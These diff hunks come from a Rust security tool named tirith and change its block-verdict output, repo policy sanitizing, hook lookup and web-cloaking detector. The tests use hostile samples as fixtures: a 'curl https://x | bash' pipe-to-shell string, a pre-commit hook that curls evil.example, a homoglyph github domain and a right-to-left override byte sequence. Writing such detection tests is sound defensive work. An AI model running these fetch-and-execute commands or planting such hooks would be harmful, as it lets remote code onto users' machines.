+                similar_to: "github.com".to_string(),
+            }],
+        );
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        assert!(
+            out.contains(
+                "To allow (trusts the whole domain): tirith trust add gіthub.com --broad --rule confusable_domain --ttl 30d"
+            ),
+            "bare-domain block must render the --broad To-allow line: {out}"
+        );
+    }
+
+    #[test]
+    fn block_with_url_and_host_prefers_full_url_no_broad() {
+        // When both a full URL and a host are present, the full URL wins (narrow,
+        // no --broad) and only ONE To-allow line is emitted.
+        let verdict = block_verdict_with_evidence(
+            RuleId::PlainHttpToSink,
+            vec![
+                Evidence::HostComparison {
+                    raw_host: "evil.example".to_string(),
+                    similar_to: "ok.example".to_string(),
+                },
+                Evidence::Url {
+                    raw: "http://evil.example/x.sh".to_string(),
+                },
+            ],
+        );
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        assert!(
+            out.contains(
+                "tirith trust add http://evil.example/x.sh --rule plain_http_to_sink --ttl 30d"
+            ),
+            "full URL must be preferred over the host: {out}"
+        );
+        assert!(
+            !out.contains("--broad"),
+            "full-URL path must not use --broad: {out}"
+        );
+        assert_eq!(
+            out.matches("To allow").count(),
+            1,
+            "exactly one To-allow line: {out}"
+        );
+    }
+
+    #[test]
+    fn block_with_destructive_finding_renders_blast_radius_header() {
+        // 14c: a Block containing a destructive Blast* finding renders the
+        // blast-radius header pointing at `tirith preview`.
+        let verdict = block_verdict_with_evidence(
+            RuleId::BlastDeletesOutsideRepo,
+            vec![Evidence::Text {
+                detail: "target '/home' is outside the repo".to_string(),
+            }],
+        );
+        for color in [false, true] {
+            let mut buf = Vec::new();
+            if color {
+                write_human(&verdict, false, &mut buf).unwrap();
+            } else {
+                write_human_no_color(&verdict, false, &mut buf).unwrap();
+            }
+            let out = String::from_utf8(buf).unwrap();
+            assert!(
+                out.contains("blast radius:") && out.contains("tirith preview -- <cmd>"),
+                "destructive block must render the blast-radius header (color={color}): {out}"
+            );
+        }
+    }
+
+    #[test]
+    fn block_with_fetch_pipe_finding_renders_blast_radius_header() {
+        // 14c: the fetch-pipe family (here CurlPipeShell) also trips the header.
+        let verdict = block_verdict_with_evidence(
+            RuleId::CurlPipeShell,
+            vec![Evidence::Text {
+                detail: "curl https://x | bash".to_string(),
+            }],
+        );
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        assert!(
+            out.contains("blast radius:"),
+            "curl-pipe-shell block must render the blast-radius header: {out}"
+        );
+    }
+
+    #[test]
+    fn block_without_url_or_destructive_renders_neither_advisory() {
+        // A non-URL, non-destructive block (e.g. a bidi-control terminal finding
+        // whose only evidence is a byte sequence) must emit NEITHER the To-allow
+        // line NOR the blast-radius header.
+        let verdict = block_verdict_with_evidence(
+            RuleId::BidiControls,
+            vec![Evidence::ByteSequence {
+                offset: 0,
+                hex: "e2 80 ae".to_string(),
+                description: "RIGHT-TO-LEFT OVERRIDE".to_string(),
+            }],
+        );
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        assert!(
+            !out.contains("To allow"),
+            "no URL/host → no To-allow line: {out}"
+        );
+        assert!(
+            !out.contains("blast radius:"),
+            "non-destructive → no blast-radius header: {out}"
+        );
+    }
+
+    #[test]
+    fn non_block_verdict_renders_no_block_advisories() {
+        // The advisories are gated on Action::Block; a Warn verdict (even with a
+        // URL) must not show them.
+        let mut verdict = block_verdict_with_evidence(
+            RuleId::ShortenedUrl,
+            vec![Evidence::Url {
+                raw: "https://bit.ly/x".to_string(),
+            }],
+        );
+        verdict.action = Action::Warn;
+        let mut buf = Vec::new();
+        write_human_no_color(&verdict, false, &mut buf).unwrap();
+        let out = String::from_utf8(buf).unwrap();
+        assert!(
+            !out.contains("To allow"),
+            "Warn must not show To-allow: {out}"
+        );
+        assert!(
+            !out.contains("blast radius:"),
+            "Warn must not show blast-radius: {out}"
         );
     }
 

--- a/crates/tirith-core/src/policy.rs
+++ b/crates/tirith-core/src/policy.rs
@@ -72,6 +72,19 @@ pub enum PolicyScope {
     Default,
 }
 
+impl PolicyScope {
+    /// Canonical lowercase scope label (matches the JSON `policy_scope` field).
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Repo => "repo",
+            Self::User => "user",
+            Self::Org => "org",
+            Self::Remote => "remote",
+            Self::Default => "default",
+        }
+    }
+}
+
 /// Policy configuration loaded from YAML.
 #[derive(Debug, Clone, Serialize, Deserialize)]
 #[serde(default)]

--- a/crates/tirith-core/src/policy.rs
+++ b/crates/tirith-core/src/policy.rs
@@ -306,6 +306,15 @@ pub struct Policy {
     /// allows `objects.github.com` but not `evilgithub.com`).
     #[serde(default)]
     pub allowed_install_domains: Vec<String>,
+
+    /// Presentation bookkeeping (NOT a policy knob). When this policy is repo-
+    /// scoped, [`Self::sanitize_repo_scoped`] records here the YAML key name of
+    /// every field whose hostile value it neutralized, so the UX layer can show
+    /// the operator exactly which repo settings were ignored. Never serialized
+    /// (`#[serde(skip)]`): a repo YAML can neither set nor read it. Empty unless
+    /// `sanitize_repo_scoped` ran and found a non-default to reset.
+    #[serde(skip)]
+    pub neutralized_fields: Vec<&'static str>,
 }
 
 /// **M7 ch2** — `tirith share` policy configuration. Empty-default is the
@@ -611,7 +620,7 @@ fn matcher_matches(matcher: &AgentMatcher, origin: &AgentOrigin) -> bool {
 }
 
 /// Threat intelligence configuration.
-#[derive(Debug, Clone, Serialize, Deserialize)]
+#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 #[serde(default)]
 pub struct ThreatIntelConfig {
     /// Auto-update interval in hours. 0 = disabled. Default: 24.
@@ -661,7 +670,7 @@ fn default_approval_fallback() -> String {
 }
 
 /// Webhook configuration for event notification.
-#[derive(Debug, Clone, Serialize, Deserialize)]
+#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 pub struct WebhookConfig {
     /// Webhook URL.
     pub url: String,
@@ -735,7 +744,7 @@ pub struct ScanPolicyConfig {
 }
 
 /// Per-rule allowlist scoping.
-#[derive(Debug, Clone, Serialize, Deserialize)]
+#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 pub struct AllowlistRule {
     /// Rule ID to scope the allowlist entry to.
     pub rule_id: String,
@@ -877,6 +886,7 @@ impl Default for Policy {
             hooks_guard_enabled: false,
             baseline_enabled: false,
             allowed_install_domains: Vec::new(),
+            neutralized_fields: Vec::new(),
         }
     }
 }
@@ -1267,9 +1277,41 @@ impl Policy {
     fn sanitize_repo_scoped(&mut self) {
         let defaults = Policy::default();
 
+        // Presentation bookkeeping (design C): record the YAML key of every field
+        // we neutralize so the UX layer can tell the operator exactly which repo
+        // settings were ignored. `record` pushes a key only when the field is
+        // about to actually change; the reset that follows is byte-for-byte the
+        // historical behavior — recording NEVER alters a final field value.
+        // `neutralized_fields` is reset first so a re-sanitize is idempotent.
+        self.neutralized_fields.clear();
+        let mut neutralized: Vec<&'static str> = Vec::new();
+        macro_rules! record {
+            // Field-equality form: reset target is the default's value for the
+            // field, so "changed" == "differs from default".
+            ($key:expr, $field:ident) => {
+                if self.$field != defaults.$field {
+                    neutralized.push($key);
+                }
+            };
+            // Explicit-predicate form: the reset target is a literal (false /
+            // None) that may NOT be the Default (e.g. `allow_bypass_env` defaults
+            // to true but is forced false). `$changed` is a bool that is true iff
+            // the current value differs from that reset target.
+            ($key:expr, $changed:expr) => {
+                if $changed {
+                    neutralized.push($key);
+                }
+            };
+        }
+
         // Suppression vectors — a repo must not be able to DROP a finding. The
         // engine's allowlist/allowlist_rules path (engine.rs `findings.retain`)
         // and severity downgrades are the documented suppression surfaces.
+        record!("allowlist", allowlist);
+        record!("allowlist_rules", allowlist_rules);
+        record!("network_allow", network_allow);
+        record!("additional_known_domains", additional_known_domains);
+        record!("severity_overrides", severity_overrides);
         self.allowlist = defaults.allowlist;
         self.allowlist_rules = defaults.allowlist_rules;
         self.network_allow = defaults.network_allow;
@@ -1278,6 +1320,22 @@ impl Policy {
 
         // Bypass / remote-fail relaxation — a repo must not be able to re-enable
         // the `TIRITH=0` bypass or steer remote-fetch failure toward open/cached.
+        // NOTE: `allow_bypass_env` defaults to TRUE (permissive), so leaving/omitting
+        // it (the common case for ANY repo policy) is NOT a weakening attempt — it is
+        // forced false for safety regardless. We deliberately do NOT record it, so the
+        // operator-facing "ignored weakening fields" notice never fires for a
+        // tightening-only repo. `allow_bypass_env_noninteractive` defaults FALSE, so a
+        // `true` there IS an explicit weakening and is recorded. The resets below are
+        // unchanged.
+        record!(
+            "allow_bypass_env_noninteractive",
+            self.allow_bypass_env_noninteractive
+        );
+        record!(
+            "policy_fetch_fail_mode",
+            self.policy_fetch_fail_mode.is_some()
+        );
+        record!("enforce_fail_mode", self.enforce_fail_mode.is_some());
         self.allow_bypass_env = false;
         self.allow_bypass_env_noninteractive = false;
         self.policy_fetch_fail_mode = None;
@@ -1285,6 +1343,13 @@ impl Policy {
 
         // Exfil / remote redirection — a repo must not be able to ship findings
         // to its own webhook or point discovery at its own policy server.
+        record!("webhooks", webhooks);
+        record!("policy_server_url", self.policy_server_url.is_some());
+        record!(
+            "policy_server_api_key",
+            self.policy_server_api_key.is_some()
+        );
+        record!("dlp_custom_patterns", dlp_custom_patterns);
         self.webhooks = defaults.webhooks;
         self.policy_server_url = None;
         self.policy_server_api_key = None;
@@ -1293,6 +1358,10 @@ impl Policy {
         // Guard-disable suppression — a repo must not be able to turn OFF a guard
         // that defaults ON, demote/silence supply-chain findings, disable threat
         // lookups, or downgrade a paste-source mismatch by self-listing its host.
+        record!("context_guard_enabled", context_guard_enabled);
+        record!("package_policy", package_policy);
+        record!("threat_intel", threat_intel);
+        record!("allowed_install_domains", allowed_install_domains);
         self.context_guard_enabled = defaults.context_guard_enabled;
         self.package_policy = defaults.package_policy.clone();
         self.threat_intel = defaults.threat_intel.clone();
@@ -1303,10 +1372,26 @@ impl Policy {
         // the `tirith scan` walk or relax its CI gate. Reset the weakening scan
         // sub-fields; `additional_config_files` and `mcp_allowed_tools` are
         // tightening (more coverage / an opt-in tool allow-list) and stay.
+        if self.scan.trusted_mcp_servers != defaults.scan.trusted_mcp_servers {
+            neutralized.push("scan.trusted_mcp_servers");
+        }
+        if self.scan.ignore_patterns != defaults.scan.ignore_patterns {
+            neutralized.push("scan.ignore_patterns");
+        }
+        if self.scan.fail_on != defaults.scan.fail_on {
+            neutralized.push("scan.fail_on");
+        }
+        // `scan.profiles` (HashMap<String, ScanProfile>) has no PartialEq; its
+        // default is empty, so a non-empty map is an author-set (weakening) value.
+        if !self.scan.profiles.is_empty() {
+            neutralized.push("scan.profiles");
+        }
         self.scan.trusted_mcp_servers = defaults.scan.trusted_mcp_servers.clone();
         self.scan.ignore_patterns = defaults.scan.ignore_patterns.clone();
         self.scan.fail_on = defaults.scan.fail_on.clone();
         self.scan.profiles = defaults.scan.profiles.clone();
+
+        self.neutralized_fields = neutralized;
     }
 
     /// Return a fail-closed policy that blocks everything.
@@ -3146,6 +3231,10 @@ custom_rules:
             scope: PolicyScope::Repo,
             context_labels: BTreeMap::new(),
             ssh_host_labels: BTreeMap::new(),
+            // Presentation bookkeeping — `sanitize_repo_scoped` OVERWRITES this,
+            // so the initial value is inert; set empty only to keep the
+            // (no-`..`) constructor total.
+            neutralized_fields: Vec::new(),
         };
 
         p.sanitize_repo_scoped();
@@ -3205,6 +3294,12 @@ custom_rules:
             scope,
             context_labels,
             ssh_host_labels,
+            // Presentation bookkeeping (design C) — NOT a sanitize-classified
+            // field (neither RESET nor KEPT). The sanitizer WRITES this with the
+            // keys it neutralized; it is `#[serde(skip)]` and a repo cannot set
+            // it. Bound here only to keep the no-`..` destructure total; its
+            // population is asserted by `sanitize_records_neutralized_fields`.
+            neutralized_fields: _,
         } = p;
 
         // ---- RESET: every weakening/suppression/exfil knob back to default ----
@@ -3354,5 +3449,80 @@ custom_rules:
         assert_eq!(scope, PolicyScope::Repo, "untouched: scope");
         assert!(context_labels.is_empty(), "untouched: context_labels");
         assert!(ssh_host_labels.is_empty(), "untouched: ssh_host_labels");
+    }
+
+    /// Design C — `sanitize_repo_scoped` records the YAML key of every WEAKENING
+    /// field it neutralized into `neutralized_fields`, so the UX layer can surface
+    /// which repo settings were ignored. Verifies: (1) repo `allowlist` +
+    /// `severity_overrides` are recorded; (2) `allow_bypass_env` (default true,
+    /// permissive) is NOT recorded — leaving it at the default is not an author
+    /// weakening attempt — while `allow_bypass_env_noninteractive` (default false)
+    /// IS recorded when set true; (3) a tightening-only / all-default policy records
+    /// nothing, so the operator notice never fires for it.
+    #[test]
+    fn sanitize_records_neutralized_fields() {
+        let mut p = Policy {
+            allowlist: vec!["evil.example".into()],
+            severity_overrides: HashMap::from([("curl_pipe_shell".into(), Severity::Low)]),
+            allow_bypass_env_noninteractive: true,
+            ..Policy::default()
+        };
+        p.sanitize_repo_scoped();
+
+        assert!(
+            p.neutralized_fields.contains(&"allowlist"),
+            "allowlist (non-default) must be recorded; got {:?}",
+            p.neutralized_fields
+        );
+        assert!(
+            p.neutralized_fields.contains(&"severity_overrides"),
+            "severity_overrides (non-default) must be recorded; got {:?}",
+            p.neutralized_fields
+        );
+        // Permissive-default `allow_bypass_env` is forced false but NOT recorded;
+        // restrictive-default `allow_bypass_env_noninteractive` set true IS recorded.
+        assert!(
+            !p.neutralized_fields.contains(&"allow_bypass_env"),
+            "allow_bypass_env (permissive default) must NOT be recorded; got {:?}",
+            p.neutralized_fields
+        );
+        assert!(
+            p.neutralized_fields
+                .contains(&"allow_bypass_env_noninteractive"),
+            "allow_bypass_env_noninteractive (set true) must be recorded; got {:?}",
+            p.neutralized_fields
+        );
+        // No key recorded more than once (the leading `clear()` prevents append).
+        let mut deduped = p.neutralized_fields.clone();
+        deduped.sort_unstable();
+        deduped.dedup();
+        assert_eq!(
+            deduped.len(),
+            p.neutralized_fields.len(),
+            "neutralized keys must be unique; got {:?}",
+            p.neutralized_fields
+        );
+        // The reset VALUES are unchanged: suppression knobs back to default, both
+        // bypass flags forced off.
+        assert!(p.allowlist.is_empty(), "allowlist still reset to default");
+        assert!(
+            p.severity_overrides.is_empty(),
+            "severity_overrides still reset to default"
+        );
+        assert!(!p.allow_bypass_env, "allow_bypass_env still forced false");
+        assert!(
+            !p.allow_bypass_env_noninteractive,
+            "allow_bypass_env_noninteractive still forced false"
+        );
+
+        // A tightening-only / all-default policy records NOTHING — so the
+        // operator-facing weakening notice never fires for a benign repo.
+        let mut all_default = Policy::default();
+        all_default.sanitize_repo_scoped();
+        assert!(
+            all_default.neutralized_fields.is_empty(),
+            "an all-default (tightening-only) policy must record nothing; got {:?}",
+            all_default.neutralized_fields
+        );
     }
 }

--- a/crates/tirith-core/src/repo_hooks.rs
+++ b/crates/tirith-core/src/repo_hooks.rs
@@ -226,8 +226,8 @@ pub fn scan_for_repo(repo_root: &Path) -> RepoHookScan {
 /// Match an entry for `tirith hooks explain` against either its short display name
 /// (`pre-commit`) OR the path `hooks scan` prints (`.git/hooks/pre-commit`), so a user
 /// can copy-paste either form. Tries, in order: exact name; the source path's file name;
-/// the full displayed path; the displayed path with a trailing `/<query>` (or bare
-/// suffix) so a relative fragment of the printed path also matches.
+/// the full displayed path; or the displayed path with a trailing `/<query>` so a
+/// path-segment-aligned fragment of the printed path also matches.
 fn entry_matches(entry: &RepoHookEntry, query: &str) -> bool {
     if entry.name == query {
         return true;
@@ -237,7 +237,7 @@ fn entry_matches(entry: &RepoHookEntry, query: &str) -> bool {
         return true;
     }
     let disp = sp.to_string_lossy();
-    disp == query || disp.ends_with(&format!("/{query}")) || disp.ends_with(query)
+    disp == query || disp.ends_with(&format!("/{query}"))
 }
 
 /// Look up a surface by name for `tirith hooks explain`. Returns every matching entry
@@ -1835,6 +1835,21 @@ mod tests {
         assert!(
             explain_for_repo(root.path(), ".git/hooks/bogus").is_empty(),
             "an unknown path must not match"
+        );
+
+        // Partial-COMPONENT fragments must NOT match (these only matched via the
+        // now-removed bare `ends_with(query)` clause).
+        for q in ["commit", "mit", "re-commit"] {
+            assert!(
+                explain_for_repo(root.path(), q).is_empty(),
+                "partial-component fragment {q:?} must not match"
+            );
+        }
+        // But a path-segment-aligned suffix of the displayed path DOES match (the
+        // `/<query>` clause): `.git/hooks/pre-commit` ends with `/hooks/pre-commit`.
+        assert!(
+            !explain_for_repo(root.path(), "hooks/pre-commit").is_empty(),
+            "segment-aligned suffix hooks/pre-commit should match via the /<query> clause"
         );
     }
 

--- a/crates/tirith-core/src/repo_hooks.rs
+++ b/crates/tirith-core/src/repo_hooks.rs
@@ -223,13 +223,30 @@ pub fn scan_for_repo(repo_root: &Path) -> RepoHookScan {
     }
 }
 
+/// Match an entry for `tirith hooks explain` against either its short display name
+/// (`pre-commit`) OR the path `hooks scan` prints (`.git/hooks/pre-commit`), so a user
+/// can copy-paste either form. Tries, in order: exact name; the source path's file name;
+/// the full displayed path; the displayed path with a trailing `/<query>` (or bare
+/// suffix) so a relative fragment of the printed path also matches.
+fn entry_matches(entry: &RepoHookEntry, query: &str) -> bool {
+    if entry.name == query {
+        return true;
+    }
+    let sp = entry.source_path.as_path();
+    if sp.file_name().and_then(|n| n.to_str()) == Some(query) {
+        return true;
+    }
+    let disp = sp.to_string_lossy();
+    disp == query || disp.ends_with(&format!("/{query}")) || disp.ends_with(query)
+}
+
 /// Look up a surface by name for `tirith hooks explain`. Returns every matching entry
 /// (a name like `pre-commit` can exist under `.git/hooks`, `.husky`, AND `lefthook.yml`).
 pub fn explain_for_cwd(name: &str) -> Vec<RepoHookEntry> {
     let scan = scan_for_cwd();
     scan.entries
         .into_iter()
-        .filter(|e| e.name == name)
+        .filter(|e| entry_matches(e, name))
         .collect()
 }
 
@@ -238,7 +255,7 @@ pub fn explain_for_repo(repo_root: &Path, name: &str) -> Vec<RepoHookEntry> {
     scan_for_repo(repo_root)
         .entries
         .into_iter()
-        .filter(|e| e.name == name)
+        .filter(|e| entry_matches(e, name))
         .collect()
 }
 
@@ -1788,6 +1805,37 @@ mod tests {
         let root = tempdir().unwrap();
         write(root.path(), ".husky/pre-commit", "#!/bin/sh\nnpm test\n");
         assert!(explain_for_repo(root.path(), "nonexistent").is_empty());
+    }
+
+    /// `explain` must accept BOTH the short hook name (`pre-commit`) AND the path that
+    /// `hooks scan` prints (`.git/hooks/pre-commit`), since a user naturally copies the
+    /// displayed path. A bogus query still matches nothing.
+    #[cfg(unix)]
+    #[test]
+    fn explain_matches_short_name_or_displayed_path() {
+        let root = tempdir().unwrap();
+        mkgit(root.path());
+        write(
+            root.path(),
+            ".git/hooks/pre-commit",
+            "#!/bin/sh\ncurl https://evil.example\n",
+        );
+
+        // Short name.
+        let by_name = explain_for_repo(root.path(), "pre-commit");
+        assert_eq!(by_name.len(), 1, "short name should match: {by_name:?}");
+        assert_eq!(by_name[0].name, "pre-commit");
+
+        // The displayed path form (what `hooks scan` prints).
+        let by_path = explain_for_repo(root.path(), ".git/hooks/pre-commit");
+        assert_eq!(by_path.len(), 1, "displayed path should match: {by_path:?}");
+        assert_eq!(by_path[0].name, "pre-commit");
+
+        // A bogus query matches nothing.
+        assert!(
+            explain_for_repo(root.path(), ".git/hooks/bogus").is_empty(),
+            "an unknown path must not match"
+        );
     }
 
     #[test]

--- a/crates/tirith-core/src/rules/cloaking.rs
+++ b/crates/tirith-core/src/rules/cloaking.rs
@@ -195,23 +195,19 @@ pub fn check(url: &str) -> Result<CloakingResult, String> {
     let baseline_idx = 0;
     let baseline_body = &responses[baseline_idx].2;
 
-    // A failed baseline would otherwise flag every successful agent as cloaked.
+    // The baseline (chrome) is the reference every other user-agent is diffed
+    // against. If it never loaded (its fetch failed, or returned an empty body)
+    // there is nothing to compare to, so the check could not actually run. This
+    // is only reachable when the baseline UA specifically failed while some other
+    // UA succeeded; an all-failed run already returned the `successful_count == 0`
+    // error above. Report it as inconclusive (Err) rather than `cloaking_detected:
+    // false`. Claiming "no cloaking" off an absent baseline is a false negative,
+    // and a cloaking site that serves chrome an empty/blocked page is exactly the
+    // case we must not silently pass.
     if baseline_body.is_empty() {
-        let agent_responses: Vec<AgentResponse> = responses
-            .iter()
-            .map(|(name, status, body)| AgentResponse {
-                agent_name: name.clone(),
-                status_code: *status,
-                content_length: body.len(),
-            })
-            .collect();
-        return Ok(CloakingResult {
-            url: url.to_string(),
-            cloaking_detected: false,
-            findings: Vec::new(),
-            agent_responses,
-            diff_pairs: Vec::new(),
-        });
+        return Err("baseline (chrome) fetch failed or returned an empty body, \
+             cloaking analysis inconclusive (no reference to compare against)"
+            .to_string());
     }
 
     let baseline_normalized = normalize_html(baseline_body);
@@ -517,6 +513,12 @@ mod tests {
 
     #[test]
     fn test_cloaking_rejects_localhost_target_before_fetch() {
+        // Serialize with the empty-baseline test below: that test sets
+        // `TIRITH_ALLOW_PRIVATE_FETCH=1` process-wide, which (if it overlapped)
+        // would relax the very localhost rejection this test asserts.
+        let _env_lock = crate::TEST_ENV_LOCK
+            .lock()
+            .unwrap_or_else(|e| e.into_inner());
         match check("http://localhost/") {
             Ok(_) => panic!("expected localhost target to be rejected"),
             Err(err) => assert!(err.contains("localhost")),
@@ -624,5 +626,109 @@ mod tests {
         // And of the two error variants, only Connect is treated as unreachable.
         assert!(FetchErr::Connect(String::new()).is_host_unreachable());
         assert!(!FetchErr::Other(String::new()).is_host_unreachable());
+    }
+
+    /// Snapshot an env var and restore it on `Drop`.
+    struct EnvVarGuard {
+        key: &'static str,
+        prev: Option<std::ffi::OsString>,
+    }
+
+    impl EnvVarGuard {
+        fn set(key: &'static str, value: impl AsRef<std::ffi::OsStr>) -> Self {
+            let prev = std::env::var_os(key);
+            unsafe { std::env::set_var(key, value) };
+            Self { key, prev }
+        }
+    }
+
+    impl Drop for EnvVarGuard {
+        fn drop(&mut self) {
+            match &self.prev {
+                Some(v) => unsafe { std::env::set_var(self.key, v) },
+                None => unsafe { std::env::remove_var(self.key) },
+            }
+        }
+    }
+
+    /// When the BASELINE (chrome, USER_AGENTS[0]) returns an empty body but other
+    /// user-agents succeed, there is no reference to diff against and the check
+    /// could not actually run. It MUST come back inconclusive (`Err`), never
+    /// `Ok { cloaking_detected: false }`. Claiming "no cloaking" off an absent
+    /// baseline is the false negative this guards. A cloaking site that serves
+    /// chrome an empty/blocked page while serving bots real content is exactly
+    /// this case, so a silent "no cloaking" would be the worst possible answer.
+    ///
+    /// Driven end-to-end against a loopback server that returns an empty 200 to
+    /// the chrome UA and real content to everyone else. `successful_count` is
+    /// therefore > 0 (chrome's empty 200 still counts as a successful fetch), so
+    /// the `successful_count == 0` guard does NOT fire and execution reaches the
+    /// empty-baseline branch under test.
+    #[test]
+    fn test_empty_baseline_is_inconclusive_not_no_cloaking() {
+        use std::io::{Read as _, Write as _};
+        use std::net::TcpListener;
+
+        // Loopback fetches are SSRF-blocked by default; the carve-out opt-in is
+        // process-wide, so serialize with other env-sensitive cloaking tests.
+        let _env_lock = crate::TEST_ENV_LOCK
+            .lock()
+            .unwrap_or_else(|e| e.into_inner());
+        let _allow_private = EnvVarGuard::set("TIRITH_ALLOW_PRIVATE_FETCH", "1");
+
+        let listener = TcpListener::bind("127.0.0.1:0").expect("bind loopback");
+        let addr = listener.local_addr().expect("addr");
+
+        // Serve one connection per user-agent. Chrome (the baseline) gets an empty
+        // 200; every other UA gets a non-empty body. `Connection: close` keeps each
+        // request on its own connection so the accept loop stays deterministic.
+        let n_agents = USER_AGENTS.len();
+        let server = std::thread::spawn(move || {
+            for _ in 0..n_agents {
+                let (mut sock, _) = match listener.accept() {
+                    Ok(pair) => pair,
+                    Err(_) => break,
+                };
+                // Read the request head; the User-Agent line tells us who is asking.
+                let mut buf = [0u8; 2048];
+                let n = sock.read(&mut buf).unwrap_or(0);
+                let req = String::from_utf8_lossy(&buf[..n]);
+                let is_chrome = req
+                    .lines()
+                    .filter_map(|l| l.split_once(':'))
+                    .any(|(k, v)| k.eq_ignore_ascii_case("user-agent") && v.contains("Chrome/"));
+
+                let body = if is_chrome {
+                    String::new()
+                } else {
+                    "<html><body>Real content served to this agent.</body></html>".to_string()
+                };
+                let resp = format!(
+                    "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}",
+                    body.len(),
+                    body
+                );
+                let _ = sock.write_all(resp.as_bytes());
+                let _ = sock.flush();
+            }
+        });
+
+        let result = check(&format!("http://{addr}/"));
+        let _ = server.join();
+
+        // The contract: an empty baseline is inconclusive (Err), NOT a successful
+        // `cloaking_detected: false`. Before the fix this returned exactly that
+        // false-negative Ok value.
+        match result {
+            Ok(r) => panic!(
+                "empty baseline must be inconclusive (Err), got Ok with \
+                 cloaking_detected={}",
+                r.cloaking_detected
+            ),
+            Err(msg) => assert!(
+                msg.contains("baseline") && msg.contains("inconclusive"),
+                "error should name the empty baseline as inconclusive, got: {msg}"
+            ),
+        }
     }
 }

--- a/crates/tirith-core/src/rules/cloaking.rs
+++ b/crates/tirith-core/src/rules/cloaking.rs
@@ -85,15 +85,20 @@ impl std::fmt::Display for FetchErr {
 
 /// Classify a `reqwest::Error` from the request/connect phase.
 ///
-/// A connect failure or a connect-phase timeout means the host is unreachable
-/// regardless of user-agent → `Connect` (short-circuit). reqwest folds DNS
-/// resolution failures into the connect phase, so `is_connect()` covers the
-/// "host does not resolve" case too. Anything else (including redirect-policy
-/// errors such as our SSRF re-validation or too-many-redirects) is `Other` so
-/// the caller keeps probing the other user-agents.
+/// A connect failure means the host is unreachable regardless of user-agent →
+/// `Connect` (short-circuit). reqwest folds DNS resolution failures into the
+/// connect phase, so `is_connect()` covers the "host does not resolve" case too.
+///
+/// A TIMEOUT is deliberately NOT host-unreachable. A reachable but malicious
+/// server can accept the connection and then stall the RESPONSE for one
+/// user-agent past the client timeout (`is_timeout()` true, `is_connect()`
+/// false); short-circuiting there would skip the remaining user-agents and miss
+/// exactly the cloaking the detector exists to catch (Codex Security, PR #139).
+/// So a timeout — like a redirect-policy error or an HTTP-level failure — is
+/// `Other`, and the caller keeps probing the other user-agents.
 #[cfg(unix)]
 fn classify_reqwest_err(e: &reqwest::Error) -> FetchErr {
-    if e.is_connect() || e.is_timeout() {
+    if e.is_connect() {
         FetchErr::Connect(format!("request failed: {e}"))
     } else {
         FetchErr::Other(format!("request failed: {e}"))
@@ -545,6 +550,52 @@ mod tests {
             "a connect/DNS failure must short-circuit the user-agent loop"
         );
         assert!(matches!(classified, FetchErr::Connect(_)));
+    }
+
+    /// A reachable server that ACCEPTS the connection but stalls the RESPONSE past
+    /// the client timeout produces `is_timeout() == true` / `is_connect() == false`.
+    /// That is NOT host-unreachable: short-circuiting there would skip the remaining
+    /// user-agents and miss exactly the cloaking the detector exists to catch (Codex
+    /// Security, PR #139). Assert it classifies as `Other` so the loop keeps probing.
+    #[test]
+    fn test_response_timeout_does_not_short_circuit() {
+        use std::io::Read as _;
+        use std::net::TcpListener;
+
+        // Loopback listener that ACCEPTS the TCP connect (so this is NOT a connect
+        // failure) but never writes a response, forcing a RESPONSE-phase timeout.
+        let listener = TcpListener::bind("127.0.0.1:0").expect("bind loopback");
+        let addr = listener.local_addr().expect("addr");
+        let handle = std::thread::spawn(move || {
+            if let Ok((mut sock, _)) = listener.accept() {
+                let mut buf = [0u8; 64];
+                let _ = sock.read(&mut buf);
+                std::thread::sleep(std::time::Duration::from_millis(800));
+            }
+        });
+
+        let client = reqwest::blocking::Client::builder()
+            .timeout(std::time::Duration::from_millis(200))
+            .build()
+            .expect("client");
+        let err = client
+            .get(format!("http://{addr}/"))
+            .send()
+            .expect_err("a stalled response must time out");
+        assert!(
+            err.is_timeout() && !err.is_connect(),
+            "expected a response-phase timeout, not a connect failure, got: {err:?}"
+        );
+
+        let classified = classify_reqwest_err(&err);
+        assert!(
+            !classified.is_host_unreachable(),
+            "a response timeout from a REACHABLE server must NOT short-circuit the \
+             user-agent sweep (cloaking evasion guard)"
+        );
+        assert!(matches!(classified, FetchErr::Other(_)));
+
+        let _ = handle.join();
     }
 
     /// The non-connect path must NOT short-circuit, so the loop keeps probing the

--- a/crates/tirith-core/src/rules/cloaking.rs
+++ b/crates/tirith-core/src/rules/cloaking.rs
@@ -43,6 +43,63 @@ pub struct DiffPair {
     pub diff_text: Option<String>,
 }
 
+/// Why a single user-agent fetch failed.
+///
+/// `Connect` means the host could not be reached at all (DNS resolution or TCP
+/// connect failure, or a connect-phase timeout) — that failure is identical for
+/// every user-agent, so the caller short-circuits the loop. Every other failure
+/// (`Other`) is treated as agent-specific and the caller keeps trying the
+/// remaining user-agents, because a fetch that *reaches* the server but fails
+/// (or returns a different status) for one UA and not another IS the cloaking
+/// signal we are looking for. An HTTP error response is not a `FetchErr` at all:
+/// it is returned as `Ok((status, body))` so status differences stay visible.
+#[cfg(unix)]
+enum FetchErr {
+    /// Host unreachable for everyone (DNS/connect failure or connect timeout).
+    Connect(String),
+    /// Anything else: redirect/SSRF rejection, oversized/unreadable body, etc.
+    Other(String),
+}
+
+#[cfg(unix)]
+impl FetchErr {
+    /// True only for an unambiguous host-unreachable failure. Be conservative:
+    /// anything uncertain returns false so cloaking is never under-tested.
+    fn is_host_unreachable(&self) -> bool {
+        matches!(self, FetchErr::Connect(_))
+    }
+
+    fn message(&self) -> &str {
+        match self {
+            FetchErr::Connect(m) | FetchErr::Other(m) => m,
+        }
+    }
+}
+
+#[cfg(unix)]
+impl std::fmt::Display for FetchErr {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        f.write_str(self.message())
+    }
+}
+
